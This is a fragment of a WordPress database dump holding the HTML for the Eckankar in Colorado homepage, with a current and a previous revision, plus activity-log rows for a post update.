data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241857,41083,'_message_key','post_updated'),(241858,41083,'_user_id','2'),(241859,41083,'_user_login','S8zhaBda'),(241860,41083,'_user_email','nada@zipnadanot.org'),(241861,41083,'_server_remote_addr','76.130.120.x'),(241862,41083,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241863,41084,'post_id','7160'),(241864,41084,'post_type','page'),(241865,41084,'post_title','Home'),(241866,41084,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 